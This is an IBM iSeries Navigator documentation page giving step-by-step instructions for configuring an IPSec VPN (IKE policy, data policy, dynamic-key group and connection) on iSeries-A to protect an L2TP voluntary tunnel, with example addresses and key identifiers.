Configure VPN on iSeries-A

Follow these steps to configure VPN on iSeries-A:

  1. Configure the Internet Key Exchange policy
    1. In iSeries™ Navigator, expand iSeries-A > Network > IP Policies > Virtual Private Networking > IP Security Policies.
    2. Right-click Internet Key Exchange Policies and select New Internet Key Exchange Policy.
    3. On the Remote Server page, select Version 4 IP address as the identifier type and then enter 205.13.237.6 in the IP address field.
    4. On the Associations page, select Preshared key to indicate that this connection uses a preshared key to authenticate this policy.
    5. Enter the preshared key in the Key field. Treat your preshared key like a password.
    6. Select Key Identifier for the local key server identifier type, and then enter the key identifier in the Identifier field. For example, thisisthekeyid. Remember that the local key server has a dynamically assigned IP address which is impossible to know in advance. iSeries-B uses this identifier to identify the iSeries-A when iSeries-A initiates a connection.
    7. On the Transforms page, click Add to add the transforms that iSeries-A proposes to iSeries-B for key protection and to specify whether the IKE policy uses identity protection when initiating phase 1 negotiations.
    8. On the IKE Policy Transform page, select Preshared key for your authentication method, SHA for your hash algorithm, and 3DES-CBC for your encryption algorithm. Accept the default values for Diffie-Hellman group and Expire IKE keys after.
    9. Click OK to return to the Transforms page.
    10. Select IKE aggressive mode negotiation (no identity protection).
      Note: If you use preshared keys and aggressive mode negotiation together in your configuration, select obscure passwords that are unlikely to be cracked in attacks that scan the dictionary. It is also recommended you periodically change your passwords.
    11. Click OK to save your configurations.
  2. Configure the data policy
    1. From the VPN interface, right-click Data policies and select New Data Policy
    2. On the General page, specify the name of the data policy. For example, l2tpremoteuser
    3. Go to the Proposals page. A proposal is a collection of protocols that the initiating and responding key servers use to establish a dynamic connection between two endpoints. You can use a single data policy in several connection objects. However, not all remote VPN key servers necessarily have the same data policy properties. Therefore, you can add several proposals to one data policy. When establishing a VPN connection to a remote key server, there must be at least one matching proposal in the data policy of the initiator and the responder.
    4. Click Add to add a data policy transform
    5. Select Transport for the encapsulation mode.
    6. Click OK to return to the Transforms page.
    7. Specify a key expiration value.
    8. Click OK to save your new data policy.
  3. Configure the dynamic-key group
    1. From the VPN interface, expand Secure Connections.
    2. Right-click By Group and select New Dynamic-Key Group.
    3. On the General page, specify a name for the group. For example, l2tptocorp.
    4. Select Protects a locally initiated L2TP tunnel.
    5. For system role, select Both systems are hosts.
    6. Go to the Policy page. Select the data policy you created in the stepConfigure the data policy, l2tpremoteuser, from the Data policy drop-down list.
    7. Select Local system initiates connection to indicate that only iSeries-A can initiate connections with iSeries-B.
    8. Go to the Connections page. Select Generate the following policy filter rule for this group. Click Edit to define the parameters of the policy filter.
    9. On the Policy Filter- Local Addresses page, select Key Identifier for the identifier type.
    10. For the identifier, select the key identifier, thisisthekeyid, that you defined in the IKE policy.
    11. Go the Policy Filter - Remote Addresses page. Select IP version 4 address from the Identifier type drop-down list.
    12. Enter 205.13.237.6 in the Identifier field.
    13. Go to the Policy Filter - Services page. Enter 1701 in the Local Port and Remote Port fields. Port 1701 is the well-known port for L2TP.
    14. Select UDP from the Protocol drop-down list.
    15. Click OK to return to the Connections page.
    16. Go to the Interfaces page. Select any line or PPP profile to which this group will apply. You have not created the PPP profile for this group yet. After you do so, you will need to edit the properties of this group so that the group applies to the PPP profile you create in the next step.
    17. Click OK to create the dynamic-key group, l2tptocorp.
  4. Configure the dynamic-key connection
    1. From the VPN interface, expand By Group. This displays a list of all dynamic-key groups you have configured on iSeries-A.
    2. Right-click l2tptocorp and select New Dynamic-Key Connection.
    3. On the General page, specify an optional description for the connection.
    4. For the remote key server, select Version 4 IP address for the identifier type.
    5. Select 205.13.237.6 from the IP address drop-down list.
    6. Deselect Start on-demand.
    7. Go to the Local Addresses page. Select Key identifier for the identifier type and then select thisisthekeyid from the Identifier drop-down list.
    8. Go to the Remote Addresses page. Select IP version 4 address for the identifier type.
    9. Enter 205.13.237.6 in the Identifier field.
    10. Go to the Services page. Enter 1701 in the Local Port and Remote Port fields. Port 1701 is the well-known port for L2TP.
    11. Select UDP from the Protocol drop-down list
    12. Click OK to create the dynamic-key connection.
Parent topic: Scenario: Protect an L2TP voluntary tunnel with IPSec
Next topic: Configure a PPP connection profile and virtual line on iSeries-A